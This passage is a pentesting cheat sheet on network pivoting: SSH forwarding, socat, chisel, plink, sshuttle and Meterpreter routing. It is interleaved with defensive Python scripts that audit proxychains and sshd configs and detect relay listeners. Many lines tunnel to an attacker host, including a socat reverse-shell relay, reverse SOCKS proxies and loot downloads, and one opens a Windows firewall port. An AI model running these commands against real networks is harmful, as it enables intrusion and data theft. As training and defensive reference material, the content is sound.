
Pivoting

In penetration testing, "pivoting" refers to using a compromised system (a foothold) inside a target network as a proxy for the attacker, in order to reach hosts and services that are not directly accessible from the initial point of entry. It involves moving laterally through the network infrastructure by using the compromised system as a stepping stone towards more sensitive or valuable assets. Pivoting allows a penetration tester (or an attacker) to enumerate and exploit additional systems and vulnerabilities that the initial foothold alone could not reach.

Enumeration

Use material found on the machine and preinstalled tools:

  • arp -a
  • /etc/hosts or C:\Windows\System32\drivers\etc\hosts
  • /etc/resolv.conf
  • ipconfig /all
  • nmcli dev show
  • Statically compiled tools

Scripting Techniques

# ping sweep of 192.168.0.0/24: one backgrounded ping per host, print only the replies
for i in {1..255}; do (ping -c 1 192.168.0.${i} | grep "bytes from" &); done
# TCP port scan of a single host using bash's /dev/tcp pseudo-device (no nmap needed)
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
  • Run local tools such as nmap through a proxy (see Proxychains below)

Tools

  • Enumerating a network using native and statically compiled tools

Proxychains / FoxyProxy

  • If dynamic port forwarding is needed, open a reverse SOCKS proxy from the jumpserver back to the attacker so that the attacker's proxychains can use it (ssh -R with only a port is a reverse dynamic forward, supported since OpenSSH 7.6):
    ssh <username>@$ATTACKER_IP -R 9050 -N
    
  • Proxychains, e.g. scan the target via nmap, or connect via nc through the jump server
    proxychains nc <IP> <PORT>
    proxychains nmap <IP>
    proxychains ssh user@$TARGET_IP
    proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
    proxychains wget http://$TARGET_IP:8000/loot.zip
    
    • Use /etc/proxychains.conf or ./proxychains.conf containing:
    [ProxyList]
    # add proxy here ...
    # meanwhile
    # defaults set to "tor"
    socks4  127.0.0.1 9050
    #socks5 127.0.0.1 1337
    # proxy_dns
    
  • FoxyProxy, choose proxy type, proxy IP and port in settings
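The ProxyList stanza above is read top to bottom, and the commented-out proxy_dns line matters: without it, hostname lookups bypass the chain and go out the host's own resolver. The following parser, added here as an example (it is not part of the compendium) and run on a constructed copy of that config, extracts the chain mode and proxy entries and reports those two points so a reviewer can tell what a given proxychains.conf will actually do before relying on it:

```python
"""Parse a proxychains.conf ProxyList and report chain mode, proxy entries and DNS handling.
Added example; SAMPLE_CONF is a constructed copy of the stanza shown on this page."""
from typing import Dict, List

SAMPLE_CONF = """\
strict_chain
# proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks4  127.0.0.1 9050
#socks5 127.0.0.1 1337
"""

PROXY_TYPES = {"socks4", "socks5", "http", "raw"}
CHAIN_MODES = {"strict_chain", "dynamic_chain", "random_chain", "round_robin_chain"}


def parse_proxychains(text: str) -> Dict:
    """Return {'chain_mode', 'proxy_dns', 'proxies'} for a proxychains.conf body."""
    chain_mode = None
    proxy_dns = False
    proxies: List[Dict] = []
    in_list = False
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        if not line:
            continue
        if line == "[ProxyList]":
            in_list = True
            continue
        if not in_list:
            if line in CHAIN_MODES:
                chain_mode = line
            elif line == "proxy_dns":
                proxy_dns = True
            continue
        # Inside [ProxyList]: "<type> <host> <port> [user pass]"
        fields = line.split()
        if len(fields) < 3 or fields[0] not in PROXY_TYPES:
            raise ValueError(f"malformed ProxyList entry: {raw!r}")
        proxies.append({"type": fields[0], "host": fields[1],
                        "port": int(fields[2]), "auth": len(fields) >= 5})
    return {"chain_mode": chain_mode, "proxy_dns": proxy_dns, "proxies": proxies}


def findings(conf: Dict) -> List[str]:
    """Points a reviewer would want to know before trusting this chain."""
    out = []
    if not conf["proxies"]:
        out.append("ProxyList is empty: nothing will be proxied")
    if not conf["proxy_dns"]:
        out.append("proxy_dns is off: hostname lookups use the local resolver, not the chain")
    for p in conf["proxies"]:
        if p["type"] == "socks4":
            out.append(f"{p['host']}:{p['port']} is socks4: no remote DNS, no auth, IPv4 only")
    return out


if __name__ == "__main__":
    conf = parse_proxychains(SAMPLE_CONF)
    print(conf)
    for f in findings(conf):
        print("-", f)
```

Running it against the sample reports the single socks4 entry and that proxy_dns is disabled; uncommenting proxy_dns in the config clears the DNS finding.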

SSH port forwarding and tunnelling (primarily Unix)

  • Local Port Forwarding

    ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
    
    • Another option is to use the jumpserver directly from its CLI via ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N. One can now connect to the target via the jumpserver
    • Tip: open a port in the Windows firewall on the target via
    netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%
    
  • Dynamic Port Forwarding

    ssh -D $PORT <user>@<Jumpserver> -fN
    
  • Reverse proxy, if there is an SSH client on the jumpserver but no SSH server, run on the jumpserver (the attacker's machine is the local end):

    ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP -i $KEYFILE -fN
    
    • Tip 1: create a dedicated user on the attacker to receive the connection without exposing your own password
    • Tip 2: use -N so that no interactive shell is requested; the receiving user on the attacker does not need one
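Every variant in this section (-L, -D, -R, and the -w tunnels sshd can also offer) depends on what the sshd at the far end permits, so the defensive counterpart is an sshd_config review. The auditor below is an added example (not code from the compendium); it parses two constructed configs, a permissive one and a hardened one, using OpenSSH's rule that the first occurrence of a keyword wins and that directives under Match apply conditionally, and lists which pivoting primitives the global settings would allow:

```python
"""Audit sshd_config for the forwarding directives that SSH pivots rely on.
Added example; WEAK_CONFIG and HARDENED_CONFIG are constructed, not from any real host."""
from typing import Dict, List

# OpenSSH defaults for the directives that matter here (lower-cased keywords).
DEFAULTS = {
    "allowtcpforwarding": "yes",   # governs -L, -D and -R through this sshd
    "gatewayports": "no",          # whether -R listeners may bind non-loopback addresses
    "permittunnel": "no",          # tun/tap tunnels requested with ssh -w
    "allowagentforwarding": "yes",
    "permitopen": "any",           # destinations -L/-D may reach
}

WEAK_CONFIG = """\
Port 22
AllowTcpForwarding yes
GatewayPorts yes
PermitTunnel yes
"""

HARDENED_CONFIG = """\
Port 22
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
AllowAgentForwarding no
# Forwarding re-enabled only for one account and one destination:
Match User deploy
    AllowTcpForwarding local
    PermitOpen 10.0.5.20:5432
"""


def parse_global(text: str) -> Dict[str, str]:
    """Effective global values: sshd keeps the FIRST value it sees for a keyword,
    and everything after the first 'Match' line is conditional, so we stop there."""
    eff = dict(DEFAULTS)
    seen = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        if key in eff and key not in seen:
            eff[key] = parts[1].strip().lower() if len(parts) > 1 else ""
            seen.add(key)
    return eff


def audit(text: str) -> List[str]:
    """Human-readable findings: which pivot primitives this sshd would permit."""
    eff = parse_global(text)
    issues = []
    tcp = eff["allowtcpforwarding"]
    if tcp in ("yes", "all", "local"):
        issues.append(f"AllowTcpForwarding={tcp}: clients may use -L/-D forwarding through this host")
    if tcp in ("yes", "all", "remote"):
        issues.append(f"AllowTcpForwarding={tcp}: clients may use -R to open listeners on this host")
    if eff["gatewayports"] != "no":
        issues.append(f"GatewayPorts={eff['gatewayports']}: -R listeners may bind non-loopback addresses")
    if eff["permittunnel"] != "no":
        issues.append(f"PermitTunnel={eff['permittunnel']}: tun/tap tunnels (ssh -w) are permitted")
    if tcp in ("yes", "all", "local") and eff["permitopen"] == "any":
        issues.append("PermitOpen=any: -L/-D destinations are unrestricted")
    return issues


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(cfg) or ["no forwarding findings"])
```

The hardened config yields no global findings while still letting the deploy account reach one database port; a full review would also evaluate each Match block against the users it applies to.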

plink.exe (Windows)

cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
  • Key generation / conversion of an existing key to PuTTY format
    puttygen <keyfile> -o key.ppk
    
  • Circumvention (PowerShell), described by U.Y.
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>

Socat

Local PortForwarding via Socat

Open a local port (here 8080) on a network interface and forward it to local port 80

./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80

Open a reverse shell via Socat

  • Relay on the target/jumpserver: listen on 8000 and forward to the attacker's listener via
 ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
  • Listener on the attacker
sudo nc -lvnp 443

Jumpserver via Socat

  • Relay on a jumpserver via
./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &

Quiet Port Forwarding Through a Relay Server via Socat

  • On attacker
socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
  • On relay server
./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &

Notes: Afterwards open localhost:8000 in the attacker's browser or curl it. The processes are backgrounded via &, so they can be terminated with the corresponding job number, e.g. kill %1.

Forward Local Port via Socat

  • If a download onto the target is needed, expose a port of the attacker via a relay on the jumpserver
socat tcp-l:80,fork tcp:$ATTACKER_IP:80

Chisel

  • Does not require SSH on the target

  • Reverse Proxy

    • Bind port on attacker
    ./chisel server --reverse --port <ListeningPort> &
    
    • Reverse port on target/proxy
    ./chisel client <attacker-IP>:<attacker-Port> R:socks &
    
    • proxychains.conf contains
    [ProxyList]
    socks5 127.0.0.1 <Listening-Port>
    
  • Forward SOCKS Proxy

    • Proxy/compromised machine
    ./chisel server -p <Listen-Port> --socks5
    
    • On attacker
    ./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
    
  • Remote Port Forward

    • On attacker
    ./chisel server -p <Listen-Port> --reverse &
    
    • On forwarder
    ./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
    
  • Local Port Forwarding

    • On proxy
    ./chisel server -p <Listen-Port>
    
    • On attacker
    ./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
    
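The socat and chisel relays above all leave the same footprint on the compromised host: an extra listening socket owned by a process that does not belong there (socat, chisel, plink, or an ssh client rather than sshd). A quick host-side check is to parse ss -ltnp output and flag such listeners together with their exposure. The script below is an added example (not from the compendium) and runs on a constructed ss output that mirrors the relays in the Socat and Chisel sections:

```python
"""Flag relay/proxy listeners (socat, chisel, plink, ssh -L/-D) in `ss -ltnp` output.
Added example; SAMPLE_SS is constructed to resemble real `ss -ltnp` output."""
import re
from typing import Dict, List, Optional

SAMPLE_SS = """\
State   Recv-Q  Send-Q   Local Address:Port     Peer Address:Port  Process
LISTEN  0       128            0.0.0.0:22            0.0.0.0:*      users:(("sshd",pid=812,fd=3))
LISTEN  0       128          127.0.0.1:5432          0.0.0.0:*      users:(("postgres",pid=1020,fd=7))
LISTEN  0       5              0.0.0.0:33060         0.0.0.0:*      users:(("socat",pid=4242,fd=5))
LISTEN  0       128            0.0.0.0:8000          0.0.0.0:*      users:(("chisel",pid=4311,fd=8))
LISTEN  0       128          127.0.0.1:9050          0.0.0.0:*      users:(("ssh",pid=4390,fd=4))
LISTEN  0       4096              [::]:80               [::]:*      users:(("nginx",pid=900,fd=6))
"""

# Process names that normally have no business holding a listening socket on a server.
# "ssh" (the client) is included because -L/-D forwards are listeners owned by the client;
# "sshd" is deliberately absent.
RELAY_TOOLS = {"socat", "chisel", "plink", "plink.exe", "ssh", "sshuttle", "nc", "ncat"}
WILDCARDS = {"0.0.0.0", "[::]", "*"}
LOOPBACK = {"127.0.0.1", "[::1]"}
PROC_RE = re.compile(r'users:\(\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')


def parse_ss(text: str) -> List[Dict]:
    """One dict per LISTEN row: address, port, owning process name and pid.
    Without root, ss prints no Process column, so proc/pid come back as None."""
    rows = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 5 or cols[0] != "LISTEN":
            continue  # header or non-listening socket
        addr, _, port = cols[3].rpartition(":")
        m: Optional[re.Match] = PROC_RE.search(cols[5]) if len(cols) > 5 else None
        rows.append({"addr": addr, "port": int(port),
                     "proc": m.group("name") if m else None,
                     "pid": int(m.group("pid")) if m else None})
    return rows


def suspicious_listeners(rows: List[Dict]) -> List[Dict]:
    """Listeners owned by a relay tool, annotated with how far they are exposed."""
    hits = []
    for r in rows:
        if r["proc"] not in RELAY_TOOLS:
            continue
        if r["addr"] in WILDCARDS:
            exposure = "all interfaces"
        elif r["addr"] in LOOPBACK:
            exposure = "loopback only"
        else:
            exposure = r["addr"]
        hits.append({"port": r["port"], "proc": r["proc"], "pid": r["pid"], "exposure": exposure})
    return hits


if __name__ == "__main__":
    for h in suspicious_listeners(parse_ss(SAMPLE_SS)):
        print(f"port {h['port']:5d}  {h['proc']:<8} pid {h['pid']}  ({h['exposure']})")
```

On the sample this reports the socat relay on 33060 and the chisel server on 8000 (both on all interfaces) and the ssh SOCKS listener on 9050 (loopback only); sshd, postgres and nginx are left alone. On a real host the name list is a starting point, and rows with proc None mean the check was run without the privileges needed to see process ownership.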

sshuttle

  • pip install sshuttle
  • sshuttle -r <user>@<target> <subnet/CIDR>
  • or with the subnets determined automatically
sshuttle -r <user>@<target> -N
  • Key-based authentication
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
  • Exclude hosts via -x, for example the target/gateway server itself

Meterpreter

  • With the payload linux/x64/meterpreter_reverse_tcp (set payload linux/x64/meterpreter_reverse_tcp), after a successful connection run
portfwd add -l 22 -p 22 -r 127.0.0.1

Meterpreter add Subnet Route

run get_local_subnets
background
route add 10.1.1.0 255.255.255.0 1
route add 172.10.0.1/32 -1
route print

Meterpreter Auto Routing

  • Upload payload and catch it with multi/handler
background
use post/multi/manage/autoroute
set session 1
set subnet <10.0.0.0>
run

Meterpreter Proxy Routing

  • Start a SOCKS proxy via
use auxiliary/server/socks_proxy
  • Set proxychains on the attacker accordingly
run srvhost=127.0.0.1 srvport=9050 version=4a
curl --proxy socks4a:localhost:9050
proxychains -q nmap 10.10.47.11

rpivot